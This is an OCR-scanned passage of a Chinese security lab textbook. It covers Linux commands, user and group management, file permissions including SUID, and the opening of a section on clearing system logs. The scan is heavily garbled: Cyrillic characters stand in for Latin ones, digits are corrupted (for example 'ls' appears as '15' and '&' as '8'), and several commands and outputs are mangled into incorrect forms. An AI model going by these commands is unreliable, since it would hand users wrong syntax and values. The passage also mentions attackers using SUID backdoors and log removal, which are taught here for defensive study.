命令 行 的 开始 。 字 符 终端 窗口 中 出 现 的 Shell 提示 符 因 用 户 不 同 而 有 所 差异 ,其 中 ,普通 用 
户 的 命令 提示 符 为 " $”, 超 级 管理 员 用 户 的 命令 提示 符 为 “#”, 这 两 个 符号 之 间 所 表示 的 用 
户 身份 的 差别 ,在 Linux 攻防 中 是 非常 重要 的 。 因 为 在 Linux 用 户 的 提 权 攻击 过 程 中 , 当 同 
一 用 户 账户 在 不 同时 间 段 登录 系统 后 ,如 果 在 字符 终端 窗口 中 提示 符 从 ”$ " 变 为 “#”, 说 明 
提 权 操作 成 功 。 

Linux 系统 中 的 命令 是 区 分 大 小 写 的 。 在 Linux 命令 行 中 ,可 以 使 用 Tab 键 来 自动 补 
齐 命令 , 即 可 以 只 输入 命令 的 前 几 个 字母 ,然后 按 Tab 键 ,系统 将 自动 补 齐 该 命令 ; 如 果 命 
令 不 止 一 个 , 则 显示 所 有 和 输入 字符 相 匹配 的 命令 。 按 Tab 键 时 ,如 果 系 统 只 找到 一 个 和 
输入 字符 相 匹配 的 目录 或 文件 , 则 自动 补 齐 ; 如 果 没 有 匹配 的 内 容 或 有 多 个 相 匹配 的 名 称 ， 
系统 将 发 出 警 鸣 声 ,再 按 一 下 Tab 键 将 列 出 所 有 相 匹 配 的 内 容 , 以 供用 户 利 用 向 上 或 向 下 
的 光标 键 来 选择 。 

Linux 可 以 翻 查 曾 经 执行 过 的 历史 命令 。 如 果 要 在 一 个 命令 行 上 输入 和 执行 多 条 命 
令 , 可 以 使 用 分 号 来 分 隔 命令 ,如 “cd /;15”; 如 果 要 使 程序 以 后 台 方 式 执行 ,只 需 在 要 执行 
的 命令 后 跟 上 一 个 “8 ”符号 即 可 。 


3.1.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 掌握 以 下 内 容 。 
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(1) Linux 命令 行 的 操作 方法 。 

(2) 文件 目录 类 命令 的 使 用 方法 。 

(3) 系统 信 ， 类 命令 的 使 用 方法 。 

(4) 进程 管理 类 命令 的 使 用 方法 。 

2. 实验 条 件 

本 实验 需要 在 一 台 运行 Linux 操作 系统 的 计算 机 上 完成 ,这 台 计 算 机 既 可 以 是 一 台 物 
理 机 ,也 可 以 是 一 台 虚 拟 机 (在 实验 中 ,如 果 没 有 特殊 要 求 ,建议 使 用 虚拟 机 )。 本 实验 使 用 
的 Linux 操作 系统 为 Red Hat。 














3.1.3 实验 过 程 





步骤 1. 进入 实验 用 的 Red Hat 操作 系统 后 ,在 命令 行 终端 窗口 中 可 以 输入 简单 的 命 
令 , 如 图 3-1 所 示 。 





Red Hat Enterprise Linux Server release 5.4 (Tikanga) 
Kernel 2.6.18-164.e15 on ап i686 


cloudlab login: 


Password: 
:49 on +401 


[rootGcloudlab ^ 





图 3-1 Linux 的 字符 操作 界面 


在 命令 行 中 , 先 来 训 悉 一 些 简单 的 命令 ,并 了 解 这 些 命令 的 用 途 。 其 中 ,浏览 目录 类 命 
令 主要 包括 pwd.cd,ls ,浏览 文件 类 命令 主要 包括 cat, more, less, head, tail, A ere 类 命 
令 主要 包括 mkdir\rmdir, 文 件 操作 类 命令 主要 包括 са rm,diff, tar, mv, whereis, втер, 

步骤 2: 在 图 3-2 中 ,开始 演示 浏览 目录 类 命令 pwd, cd, ls 的 使 用 sie “ls -la 
home/” 命 令 为 列 出 home 目录 中 包含 隐藏 文件 在 内 的 所 有 文件 。 其 他 浏览 目录 类 命令 希 
自己 动手 进行 练习 。 











гыхг-хг-х 3 root root 4896 Oct 31 82:21 
rwxr-xr-x 24 root root 4896 Jan 7 06:38 
гых-- 3 test test 4896 Oct 31 B2:21 
[root$cloudlab ^J" _ 





图 3-2 浏览 目录 


步骤 3. 在 图 3-3 中 ,开始 演示 浏览 文件 类 命令 cat, more,less,head,tail 的 使 用 。 


“Is tail -3 /etc/passwd 
Sabayon user:/home/sabayon:/sbin/nologin 
tog-pegasus DpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin| 


::/home/test:/bin/bash 
[root8cloudlab ~]# _ 





图 3-3 浏览 文件 
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步骤 4: 在 图 3-4 中 ,开始 演示 目录 操作 类 命令 mkdir, rmdir 的 使 月 











[ECTITTSCTITREUNGSD mkdir /home/chen 
[A 

otal 16 

гыхг-хг-х 2 root root 4896 Jan 7 86:41 


test test 4896 Oct 31 82:21 
raotüc loud lab “m 


图 3-4 目录 操作 





步骤 5: 在 图 3-5 中 ,开始 演示 文件 操作 类 命令 cd rm. diff tar,mv, whereis grep 的 使 用 。 


/sbin/nologin 





图 3-5 文件 操作 


ТЕ Linux 操作 系统 中 ,还 有 以 下 一 些 常用 的 命令 ，。 


dmesg: 显示 系统 诊断 信息 ,操作 系统 版 本 号 、 物 理 内 存 大 小 及 其 他 信息 。 


df: 查看 文件 系统 的 各 个 分 区 占用 情况 。 

du; 查看 某 个 目录 中 的 各 级 子 目录 使 用 硬盘 空间 数 。 
free; 查看 系统 内 存 、 虚 拟 内 存 的 大 小 及 占用 情况 。 
date: 查看 和 设置 当前 日 期 和 时 间 

cal; тп 定 月 份 或 年 份 的 日 历 。 

clock; 显示 系统 时 钟 ， 

ps: 查看 系统 进程 。 

kill; 向 进程 发 送 强制 终止 信号 

killall; 根据 进程 名 发 送 终 止 信号 

nice: 指定 运行 程序 优先 级 。 

renice: 根据 进程 的 进程 号 来 改变 进程 的 优先 级 。 
top: 实时 监控 进程 状 

bg ,jobs fg: 控制 进程 显示 


3.1.4 任务 与 思考 














考虑 到 部 分 读者 对 Linux 操作 系统 的 命令 行 操作 不 熟悉 ,本 实验 主要 通过 对 常用 命令 
的 学 习 , 使 读者 逐渐 熟悉 Linux 的 操作 环境 ,并 初步 掌握 一 些 常用 命令 的 功能 和 使 用 方法 。 


Linux 在 服务 器 应 用 中 占有 绝对 的 优势 ,目前 DNS、DHCP、NAT 等 大 量 
售 息 服务 都 构建 在 Linux 操作 系统 之 上 ,同时 Web, E-mail, FTP 等 服务 
Linux 操作 系统 。 对 于 网 络 攻 防 的 学 习 来 说 ,读者 必须 通过 系统 学 习 来 党 
统 的 相关 操作 ,同时 对 Linux 的 工作 机 制 有 一 个 全 面 深入 的 认识 。 其 中 包 





t 的 互联 网 基础 


平台 也 主要 选择 
E Linux 操作 系 
5 Linux 操作 系 








统 在 进程 与 线程 管理 .内 存 管理 系统 管理 .设备 控制 .网 络 、 系 统 调用 等 方 


Н 








形成 的 特有 工 


作 机 制 ,掌握 这 些 工作 机 制 为 全 面 学 习 Linux 操作 系统 的 功能 及 应 用 特点 是 非常 有 帮助 的 。 
请 读者 借助 各 类 工具 ,通过 查阅 相关 文献 ,并 进行 实验 操作 ,来 掌握 与 Linux 工作 机 制 


相关 的 内 容 。 
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3.2 Linux 用 户 和 组 的 管理 


3.2.1 预备 知识 : Linux 用 户 和 组 的 管理 特点 


Linux 操作 系统 是 一 个 多 用 户 、 多 任务 的 操作 系统 ,允许 多 个 用 户 同时 登录 到 同一 个 系 
统 , 使 用 系统 资源 。 为 了 使 所 有 用 户 的 工作 顺利 进行 ,保护 每 个 用 户 的 文件 和 进程 ,规范 每 
个 用 户 的 权限 ,需要 区 分 不 同 的 用 户 , 因 此 产生 了 用 户 账 户 和 组 群 。 

用 户 账 户 是 用 户 的 身份 标识 ,用 户 通过 用 户 账户 可 以 登录 到 系统 ,并 且 访 问 已 经 被 授权 
的 资源 。 系 统 依据 账户 来 区 分 属于 每 个 用 户 的 文件 .进程 .任务 , 并 给 每 个 用 户 提供 特定 的 
工作 环境 ,使 每 个 用 户 的 工作 都 能 各 自 独立 不 受 干扰 地 进行 。 

Linux 系统 下 的 用 户 账户 分 为 普通 用 户 账户 和 超级 用 户 账户 (root) 两 种 类 型 。 其 中 ， 
超级 用 户 账户 又 称 为 根 用 户 或 管理 员 账 户 ,可 以 对 普通 用 户 和 整个 系统 进行 管理 。Linux 
系统 下 的 账户 管理 具有 以 下 特点 。 

(1) 组 群 也 称 为 工作 组 ,是 具有 相同 特性 的 用 户 的 逻辑 集合 ,使 用 组 群 有 利于 系统 管理 
员 按照 用 户 的 特性 组 织 和 管理 用 户 ,提高 工作 效率 。 

(2) 在 为 资源 授权 时 可 以 把 权限 赋予 某 个 组 群 ,组 群 中 的 成 员 即 可 自动 获得 这 种 权限 。 

(3) 一 个 用 户 账户 至 少 属于 一 个 用 户 组 , 当 某 一 用 户 账户 属于 多 个 组 群 的 成 员 时 ,其 中 
某 个 组 群 是 该 用 户 的 主 组 群 ( 私 有 组 群 ) ,其 他 组 群 是 该 用 户 的 附属 组 群 (标准 组 群 ) 。 

(4) 每 一 个 用 户 都 有 一 个 唯一 的 身份 标识 , 称 为 用 户 IDCUID); 每 一 个 用 户 组 也 有 一 
个 唯一 的 身份 标识 , 称 为 用 户 组 IDCGID)。 其 中 ,root 用 户 的 UID 为 0。 

(5) 普通 用 户 的 UID 可 以 在 创建 时 由 管理 员 指 定 , 如 果 不 指定 ,用 户 的 UID 默认 从 
500 开始 顺序 编号 。 

Linux 系统 下 ,用 户 账户 文件 有 以 下 两 个 。 

(1) /etc/passwd 文件 : 用 户 账户 信息 。 

(2) /etc/shadow 文件 : 用 户口 令 。 

Linux 系统 下 ,组 群 文件 有 以 下 3 个 。 

(D /etc/group 文件 : 组 群 账户 信息 。 

(2) /etc/gshadow X fF: 组 群 口令 ,管理 员 等 管理 信息 。 

(3) /etc/login. defs 文件 : 设置 用 户 账户 限制 的 文件 ,该 文件 中 的 配置 对 root 用 户 
无 效 。 


3.2.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 内 容 。 
(1) 用 户 和 组 群 的 配置 文件 。 

(2) Linux 下 用 户 的 创建 ,管理 和 维护 。 
(3) Linux 下 组 群 的 创建 ,管理 和 维护 。 
(4) 用 户 账户 管理 器 的 使 用 方法 。 
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2. 实验 条 件 


本 实验 中 所 使 用 的 Linux 操作 系统 为 Red Hat, 既 可 以 运行 在 物理 机 上 ,也 可 以 运行 在 
虚拟 环境 中 。 对 于 初学 者 来 说 ,建议 在 VMware 等 虚拟 机 环境 中 安装 Linux 操作 系统 , 进 
行 相关 的 实验 。 


3.2.3 实验 过 程 


步骤 1: 使 用 “cat/etc/passwd” 命 令 查 看 /etc/passwd 文件 ,如 图 3 





:/var/spool/mqueue:/sbin/nologin 

7var/spool^/mqueue :/sbin/nologin 

var/arpuatch:/sbin/nologin 

etc^ntp:/sbinznologin 

ystem message bus:/:/sbin/nologin 

vahi daemon:/:/sbin/nologin 

rivilege-separated SSH:/var/empty/sshd:/sbin/nologin 
‘9:29:RPC Service User:/var/lib/nfs:/sbin/nologin 
65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin 

68:HñL daemon:^/:/sbin/nologin 

:188:161:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin 


67:6?:Mebalizer:^/var/www/usage:/sbin/nologin 
7 :97:dovecot :/usr^/libexec^/dovecot :^sbinznologin 
3: :/var^spool^/squid :/sbin/nologin 

SQL Server:^/uar/lib/mysql:/bin/bash 

lamed :/var/znamed :/sbin^znologin 


6 :86:Sabayon user:/home/sabayon:^sbin/nologin 
6:65:tog-pegasus ÜpenPegasus WBEM/CIM services:/var/lib/Pegasus :/sbin| 


::/һоше/%ез: ^binzbash 
[root@cloudlab 718 _ 





图 3-6 查看 /etc/passwd 文件 

需要 说 明 的 是 ,/etc/passwd 文件 每 行使 用 ":? 分 隔 几 个 域 ,真正 的 
文件 中 

步骤 2: 使 用 “cat/etc/shadow” 命 令 查 看 /etc/shadow 文件 ,如 图 





码 保存 在 shadow 





7 所 示 。 


avahi-autoipd:tt:15599:0:99999 


istcache: tt: 28559 





图 3-7 查看 /etc/shadow 文件 
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需要 说 明 的 是 ,所 有 用 户 对 passwd 文件 均 可 读 取 ,但 只 有 root 用 户 对 shadow 文件 可 
读 , 因 此 密码 存放 在 shadow 文件 中 更 安全 。 

步骤 3: 使 用 “cat/etc/group” 命 令 查 看 /etc/group 文件 。 用 户 的 组 账 
group 文件 中 ,任何 用 户 都 可 以 查看 且 用 “:” 将 几 个 域 分 开 , 如 图 3-8 所 示 。 








8l 
rootecloudlab a 


图 3-8 查看 /etc/group 文件 


步骤 4: fiij" cat/etc/gshadow" fp 4 A fi /etc/gshadow 文件 。gshadow 文件 用 于 存放 
组 群 的 加 密 口令 组 管理 员 等 信息 ,只 有 root HEP! nf E. RJ“ :分割 成 4 个 域 ,如 图 3-9 所 示 。 








cloudlab 一 


图 3-9 查看 /etc/gshadow 文件 
又 5: 使 用 “useradd” 或 “adduser” 命 令 创 建新 用 户 ,其 命令 格式 为 : 


useradd [选项 ] <username> 


例如 ,创建 一 个 名 称 为 cloud H ,如 图 3-10 所 示 。 
需要 说 明 的 是 ,如 果 系 统 中 创建 的 用 户 名 已 经 存在 ,将 出 现 如 图 3-11 所 示 的 提示 信息 。 
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TT useradd cloud 
[rootecloudlab ~]# _ 


图 3-10 创建 新 用 户 





[rootgcloudlab ~ 18 useradd cloud 
iseradd: user cloud exists 
[root&cloudlab Мын Г 


图 3-11 当 要 创建 的 用 户 在 系统 中 存在 时 出 现 的 提示 信息 


“useradd” 命 令 的 选项 含义 


v-c comment: 用 户 的 注释 性 信息 
v-d home_dir: 指定 用 户 的 主 目录 
v-e expire date; 禁用 账号 的 日 期 ,格式 为 : YYYY-MM-DD 
z-f inactive days: 设置 账户 过 期 多 少 天 后 ,用 户 账 户 被 禁 
г-и UID: 指定 用 户 的 UID. 
v-g initial group: 用 户 所 属 主 组 群 的 组 群 名 称 或 GID 
v-G group-list; 用 户 所 属 的 附属 eui M ка 
m: 如 果 用 户主 目录 不 存在 , 则 包 
v-M: 不 要 创建 用 户主 目录 
cni 不 要 为 用 户 创建 用 户 私 人 组 群 
у-р: 加 密 的 口令 ， 
vor: 创建 UID 小 于 500 的 不 带 主 目录 的 系统 账号 
v-s: 指定 用 户 的 登录 Shell. SUA JJ / bin/ bash 
步骤 6: 新 建 用 户 userl,UID 为 510, 指 定 其 所 属 的 私有 组 为 cloud(cloud 组 的 标 
为 1001) ,用 户 的 主 目 录 为 /home/userl, 用 户 的 Shell 为 /bin/bash, 用 户 的 密码 为 123456. 
账户 永 不 过 期 ,如 图 3-12 Bros. 






< 


< 


< 





< 








[rootgcloudlab “18 groupadd 1001 
[root@cloudlab “lm useradd -u 518 -g 1881 -d ¿homezuser1 -s /bin/bash -p 123456 
-f 1 useri 


[rootB8cloudlab ~]# _ 





图 3-12 新 建 用 户 


步骤 7: 新 建 了 用 户 后 ,要 为 用 户 设 置 口令 ,未 设置 口令 的 用 户 不 能 登录 系统 ,使 用 
userl 来 登录 系统 (logout 注销 后 ,再 使 用 userl 用 户 登录 ) ,如 图 3-13 所 示 。 
[Red Hat Enterprise Linux Server release 5.4 (Tikanga) 
Kernel 2.6.18-164.е15 оп ап 1686 


loudlab login: useri 


[Login incorrect 





图 3-13 ”为 新 建 用 户 设置 口令 
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步骤 8: 请 读者 
如 图 3-14 所 示 。 





使 用 root 账户 登录 ,来 指定 和 修改 userl 用 户 账 户口 令 : passwd, 


[root8cloudlab "18 passwd user1 

hanging password for user изег1. 

сы UNIX passuord: 

[BAD PASSWORD: it is too simplistic/systematic 


[Retype neu UNIX password: 
passwd: all authentication tokens updated successfully. 
[root@cloudlab “It _ 





图 3-14 指定 和 修改 userl 用 户 账户 口令 


需要 说 明 的 是 ,超级 用 户 root 可 以 为 自己 和 其 他 用 户 设置 口令 ,而 普通 用 户 只 能 为 自 
己 设置 口令 。 

步骤 9: 创建 组 群 命令 “groupadd” 或 “addgroup”。 现 在 创建 一 个 组 群 testgroup, 如 
图 3-15 所 示 。 


[root@cloudlab ~]# groupadd testgroup 
[root@cloudlab “It _ 


图 3-15 创建 组 群 


步骤 10: 使 用 “tail -1 /etc/group” 命 令 查 看 新 建 的 组 群 信 息 , 如 图 3-16 所 示 。 


“18 groupa: testgroup 
[rootücloudlab “J tail -1 /etc/group 


estgroup:x:583: 
[root@cloudlab “It _ 





图 3-16 查看 新 建 的 组 群 信息 
步 又 11: 修改 组 群 、gid、 组 群 名 称 , 如 图 3-17 所 示 


J НИЗ testgroup 
[root8cloudlab ~]# groupmod -n grouptest testgroup 
[root8cloudlab ~]# tail -1 /etc/group 


和 rouptest:x:1883: 
[root@cloudlab “l _ 





图 3-17 修改 组 群 gid AR AE 


3.2.4 任务 与 思考 


Linux 通过 基于 角色 的 身份 认证 方式 实现 对 不 同 用 户 (user) 和 (group) 的 分 类 管理 ,来 
确保 多 用 户 、 多 任务 环境 下 操作 系统 的 安全 性 

请 读者 查阅 相关 的 文献 ,并 通过 上 机 操作 ,掌握 Linux 系统 下 用 户 和 组 群 的 创建 与 管理 
方法 。 


3.3 Linux 文件 权限 管理 


3.3.1 预备 知识 : Linux 文件 权限 管理 的 特点 
文件 是 操作 系统 用 来 存储 信 } 结构 ,是 一 组 信息 的 集合 , 它 通过 文件 名 来 唯一 标 
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i, Linux 中 的 文件 名 称 最 长 可 为 255 个 字符 ,这 些 字符 可 用 A 一 Z.0 一 9..、、- 等 符号 来 
表示 。 与 其 他 操作 系统 相 比 ,Linux 最 大 的 不 同 点 是 没有 “扩展 名 ”这 一 概念 ,也 就 是 说 文件 
的 名 称 和 该 文件 的 类 型 没有 直接 的 关系 。 例 如 , smaple. txt 可 能 是 一 个 可 执行 文件 ,而 
sample. exe 也 可 能 是 文本 文件 ,甚至 可 以 不 使 用 扩展 名 。 

Linux 文件 名 的 另 一 个 特性 是 区 分 大 小 写 。 例 如 ,sample. txt, Sample. txt, SAMPLE. 
txt 在 Linux 系统 中 分 别 代 表 不 同 的 文件 ,但 在 DOS 和 Windows 系统 下 却 是 指 同 一 个 文 
件 。 在 Linux 系统 中 ,如 果 文 件 名 以 “. ”开始 ,表示 该 文件 为 隐藏 文件 ,需要 使 用 “1s -a” 命 令 
才能 显示 。 

1. 文件 权限 概述 

Linux 系统 中 的 每 一 个 文件 或 目录 都 包含 访问 权限 ,这 些 访 问 权 限 决定 了 谁 能 访问 和 
如 何 访问 这 些 文件 和 目录 。 通 过 设置 .可 以 从 以 下 3 种 访问 方式 限制 访问 权限 。 

CD 只 允许 用 户 自己 访问 。 

(2) 允许 一 个 预先 指定 的 用 户 组 中 的 用 户 访 问 。 

(3) 允许 系统 中 的 任何 用 户 访问 。 

用 户 能 够 控制 一 个 给 定 的 文件 或 目录 的 访问 程度 。 一 个 文件 或 目录 可 能 有 读 、 写 及 执 
行 权限 。 当 创建 一 个 文件 时 ,系统 会 自动 地 赋予 文件 所 有 者 读 和 写 的 权限 ,这 样 可 以 允许 所 
有 者 能 够 显示 文件 内 容 和 修改 文件 。 文 件 所 有 者 可 以 将 这 些 权 限 改变 为 任何 他 想 指定 的 权 
限 。 一 个 文件 也 许 只 有 读 权限 ,禁止 任何 修改 ; 也 可 能 只 有 执行 权限 ,允许 像 一 个 程序 一 样 
来 执行 。 

如 图 3-18 所 示 ,每 一 行 的 第 一 个 字符 一 般 用 来 区 分 文件 的 类 型 ,一 般 取 值 为 d、-、1、b、 
c\s\pD。 具 体 含义 如 下 。 

d: 表示 一 个 目录 ,在 ext 文件 系统 中 目录 也 是 一 种 特殊 的 文件 。 

: 表示 该 文件 是 一 个 普通 的 文件 。 

1: 表示 该 文件 是 一 个 符号 链接 文件 ,实际 上 它 指 向 另 一 个 文件 。 

b.e: 分 别 表示 该 文件 为 区 块 设备 或 其 他 的 外 围 设 备 ,是 特殊 类 型 的 文件 。 

s.p: 这 些 文件 关系 到 系统 的 数据 结构 和 管道 ,通常 很 少见 到 。 


var# 15 - 

















root root 





2 
pot@Cloudləbvm: /var# _ 


3-18 显示 文件 的 类 型 


2. 文件 权限 的 组 成 

在 图 3-18 的 显示 结果 中 ,每 一 行 的 第 2 一 10 个 字符 表示 文件 的 访问 权限 。 这 9 个 字符 
每 3 个 为 一 组 ,左边 3 个 字符 表示 所 有 者 权限 ,中 间 3 个 字符 表示 与 所 有 者 同一 组 用 户 的 权 
限 ,右边 3 个 字符 是 其 他 用 户 的 权限 。 代 表 的 意义 如 下 。 
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(1) 字符 2、,3、4 表示 该 文件 所 有 者 的 权限 ,也 简称 为 uCUser) 的 权限 。 

(2) 字符 5,6,7 表示 该 文件 所 有 者 所 属 组 群 中 组 成 员 的 权限 。 例 如 ,此 文件 拥有 者 属 
于 “user” 组 群 ,该 组 群 中 有 6 个 成 员 , 表 示 这 6 个 成 员 都 有 此 处 指定 的 权限 ,简称 为 
g(Group) 的 权限 。 

(3) 字符 8.9.10 表示 该 文件 所 有 者 所 属 组 群 以 外 的 权限 ,简称 为 oCOther) 的 权限 。 

9 个 字符 根据 权限 种 类 的 不 同 , 也 分 为 以 下 几 种 类 型 。 

r(Read, 读 取 ): 对 文件 而 言 ,具有 读 取 文件 内 容 的 权限 ; 对 目录 来 说 ,具有 浏览 目录 的 
权限 。 

w(Write, 写 人 ): 对 文件 而 言 ,具有 新 增 、 修 改 文件 内 容 的 权限 ; 对 目录 来 说 ,具有 删 
除 、 移 动 目录 内 文件 的 权限 。 

x(Execute, 执 行 ): 对 文件 而 言 ,具有 执行 文件 的 权限 ; 对 目录 来 说 ,该 用 户 具 有 进入 目 
录 的 权限 。 

-: 表示 不 具有 该 项 权限 。 

每 个 用 户 都 拥有 自己 的 主 目录 ,通常 在 /home 目录 下 ,这 些 主 目录 的 默认 权限 为 
rwx—— ; 执行 “mkdir” 命 令 所 创建 的 目录 ,其 默认 权限 为 rwxrxrx。 用 户 可 以 根据 需要 修 
改 目 录 的 权限 。 

默认 的 权限 可 用 *umask” 命 令 修改 。 例 如 ,执行 “umask 777” 命 令 , 便 可 以 屏蔽 所 有 的 
权限 ,之 后 建立 的 文件 或 目录 ,其 权限 都 变 成 000。 

3. 文件 与 目录 设置 的 特殊 权限 
于 特殊 权限 会 拥有 一 些 “ 特 权 ”, 因 而 用 户 如 果 无 特殊 需求 ,不 应 该 启用 这 些 权限 , 避 
免 安全 方面 出 现 严重 漏洞 ,造成 攻击 者 入 侵 , 甚 至 破坏 系统 。 

CD s 或 SCSUID,Set UID): 当 可 执行 的 文件 拥有 了 这 个 权限 后 便 能 得 到 特权 ,使 任意 
访问 该 文件 的 所 有 者 都 能 够 使 用 全 部 系统 资源 。 请 注意 具备 SUID 权限 的 文件 ,攻击 者 经 
常 利用 这 种 权限 ,以 SUID 配 上 root 账号 拥有 者 ,在 系统 中 开启 后 门 ,供需 要 时 进出 使 用 。 

(2) s 或 SCSGID、Set GID): 设置 在 文件 上 面 , 其 效果 与 SUID 相同 ,只 不 过 将 文件 所 
有 者 换 成 用 户 组 ,该 文件 可 以 任意 访问 整个 用 户 组 所 能 使 用 的 系统 资源 。 

(3) t X T(Sticky) : /tmp 和 /var/tmp 目录 供 所 有 用 户 暂 时 访问 文件 , 即 每 位 用 户 都 拥 
有 完整 的 权限 进入 该 目录 ,去 浏览 、 删 除 和 移动 文件 。 在 文件 建立 时 系统 会 自动 设置 权限 ， 
如 果 这 些 默 认 权 限 无 法 满足 需要 ,此 时 可 以 使 用 "shmod” 命 令 来 修改 权限 。 

通常 在 权限 修改 时 可 以 用 两 种 方式 来 表示 权限 类 型 : 数字 表示 法 和 文字 表示 法 。 

“chmod” 命 令 的 格式 为 : 























chmo [选项 ] 文 件 


数字 表示 法 是 指 将 读 取 (r) 、 写 和 信 (w) 和 执行 (x) 分 别 以 4、2、1 来 表示 ,没有 授权 的 部 分 
就 表示 为 0, 然 后 再 把 所 授予 的 权限 相 加 而 成 。 


3.3.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 掌握 以 下 内 容 。 
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(1) 使 用 “chmod” 命 令 按照 要 求 更 改 用 户 对 于 特定 文件 的 权限 。 

(2) 使 用 “unmask” 命 令 更 改 上 默认 权限 。 

(3) 使 用 “chown” 命 令 更 改 文 件 的 所 属 用 户 和 组 。 

2. 实验 条 件 

本 实验 中 所 使 用 的 Linux 操作 系统 为 Red Hat, 既 可 以 运行 在 物理 机 上 ,也 可 以 运行 在 
虚拟 环境 中 。 对 于 初学 者 来 说 ,建议 本 实验 在 运行 在 虚拟 机 环境 中 的 Red Hat 系统 上 
进行 。 























3.3.3 实验 过 程 


步骤 1. 在 test 的 家 (home) 目录 中 建立 一 个 user 子 目录 ,如 图 3-19 所 示 。 


[ECTITTSETTEEUNGS D cd /home/test/ 
[root&cloudlab test]# mkdir user 
[root$cloudlab testit _ 


图 3-19 在 test 的 home 目录 中 建立 一 个 user 于 目录 


步骤 2: TE user 目录 下 建立 一 个 file 文件 ,如 图 3-20 所 示 .， 


[root&cloudlab user]# touch file 


[root8cloudlab user]# _ 





图 3-20 在 user 目录 建立 一 个 file 文件 


步骤 3: 查看 file 文件 的 所 有 属性 ,命令 为 “ls -1” ,如 图 3-21 тл. 


- 1 root root 8 Jan 7 87:12 file 
[root8cloudlab user]# _ 





图 3-21 查看 file 文件 的 所 有 属性 


步骤 4: 对 文件 file 设置 权限 ,使 其 他 用 户 可 以 对 此 文件 进行 写 操作 ,并 查看 设置 结果 ， 
命令 为 “chmod o 十 w file”, 如 图 3-22 所 示 


[rootgcloudlab изег1й 15 -1 


- 1 root root 8 Jan 7 87:12 file 
Lrootecloudlab user] chmod o+w file 


[rootecloudlab userl# ls -1 

otal 4 

| ru-r--ru- 1 root root 8 Jan 7 87:12 file 
[root8cloudlab user]# _ 





图 3-22 ”对 文件 file 设置 权限 


+ 


EXE 5. 取消 同 组 用 户 对 file 文件 的 读 取 权限 .并 查看 设置 结果 ,命令 为 “chmod ger 
file”, 如 图 3-23 所 示 。 

步骤 6: 用 数字 形式 为 文件 file 设置 权限 ,所 有 者 可 读 、 
组 用 户 只 有 读 和 执行 的 权限 。 设 置 完 成 后 查看 设置 结果 , 命 
所 示 。 








可 写 、 可 执行 ; 其 他 用 户 和 所 属 
令 为 “chmod 755 file”, 如 图 3-24 
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[rootecloudlab иѕег 18 chmod д-г file 
[root8cloudlab иѕег18 15 -1 


|-гы----гы- 1 root root 8 Jan 7 87:12 file 
[root&cloudlab иѕег18 _ 





图 3-23 取消 同 组 用 户 对 file 文件 的 读 取 权 限 


[root@cloudlab иѕег 18 chmod 755 file 
[root8cloudlab userlmu ls -1 

otal 4 

-гыхг-хг-х 1 root root 8 Jan 7 87:12 file 
[root8&cloudlab иѕег18 _ 





图 3-24 用 数字 形式 为 文件 file 设置 权限 ,所 有 者 可 读 、 可 写 、 可 执行 


Ж т. 用 数字 形式 更 改 文件 file 的 权限 ,使 所 有 者 只 能 读 取 此 文件 ,其 他 任何 用 户 都 
没有 权限 。 查 看 设置 结果 ,具体 命令 为 “chmod 400 file”, 如 图 3-25 所 示 。 


[rootgcloudlab useri chmod 488 file 
[rootB8cloudlab user]# 15 -1 

total 4 

r - 1 root root 8 Jan ? 87:12 file 
[rootGcloudlab user]ü _ 





图 3-25 用 数字 形式 更 改 文件 file 的 权限 ,使 所 有 者 只 能 读 取 此 文件 


步骤 8: 改变 文件 的 所 有 者 ,查看 目录 test 及 其 中 文件 的 所 属 用 户 和 组 。 修 改 file 文件 
的 所 有 者 为 test, 命 令 为 “chown test. test file”, 如 图 3-26 Bros. 
[root@cloudlab userlm 15 -1 


otal 4 
ai 1 test test B Jan 7 87:12 file 


[root(cloudlab useri _ 





图 3-26 改变 文件 的 所 有 者 


3.3.4 任务 与 思考 


在 Linux 中 ,不 仅仅 是 普通 的 文件 ,包括 目录 、 字 符 设备 、 块 设备 、 套 接 字 等 在 内 的 所 有 
类 型 都 以 文件 形式 被 对 待 , 即 * 一 切 皆 是 文件 ”。Linux 中 对 所 有 文件 与 设备 资源 的 访问 控 
制 都 通过 VFS(Virtual File System ,虚拟 文件 系统 ) 来 实现 ,所 以 在 Linux 的 虚拟 文件 系统 
安全 模型 中 ,可 通过 设置 文件 的 相关 属性 来 实现 系统 的 授权 和 访问 控制 。 

请 读者 查阅 相关 文献 ,结合 Linux 的 VFS 特点 ,对 Linux 的 文件 系统 进行 系统 的 学 习 ， 
并 通过 具体 的 实验 操作 掌握 其 管理 方法 。 














3.4 Linux 系统 日 志 的 清除 


3.4.1 预备 知识 : Linux 系统 日 志 的 特点 


日 志 (log) 是 指 系统 所 指定 对 象 的 某 些 操作 和 操作 结果 按时 间 先 后 顺序 组 合 后 形成 的 
集合 。 每 个 日 志文 件 由 日 志 记 录 组 成 ,每 条 日 志 记 录 描 述 了 一 次 单独 的 系统 事件 。 通 常情 
况 下 ,系统 日 志 是 用 户 可 以 直接 阅读 的 文本 文件 ,其 中 包含 了 一 个 时 间 惟 和 一 个 信息 或 子 系 
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统 所 特有 的 其 他 信息 。 日 志文 件 为 服务 器 .工作 站 、 防 火 墙 和 应 用 软件 等 信息 资源 相关 活动 
记录 必要 的 \ 有 价值 的 信息 ,这 对 系统 监控 查询 和 安全 审计 是 十 分 重要 的 。 

从 攻击 者 的 角度 来 看 ,日 志文 件 中 记录 的 事件 信息 对 攻击 者 掌握 系统 的 运行 内 容 和 运 
行 状况 是 很 有 帮助 的 ; 而 从 防范 的 角度 来 看 ,日 志 中 可 以 记录 几乎 所 有 的 攻击 行为 ,这 些 事 
件 信 息 对 于 确定 攻击 源 及 攻击 意图 ,进而 确定 相应 的 防范 方法 都 是 很 有 价值 的 。 

1. Linux 系统 中 的 主要 日 志 

在 Linux 系统 中 ,有 以 下 3 个 主要 的 日 志 子 系统 。 

CO 系统 接 人 日 志 。 多 个 程序 会 记录 该 日 志 , 分 别 记 录 到 /var/log/wtmp 和 /var/log/ 
utmp 中 ,telnet 和 ssh 等 程序 都 会 更 新 wtmp 与 utmp 文件 ,系统 管理 员 可 以 根据 该 日 志 跟 
踪 到 谁 在 什么 时 间 登 录 过 系统 。 

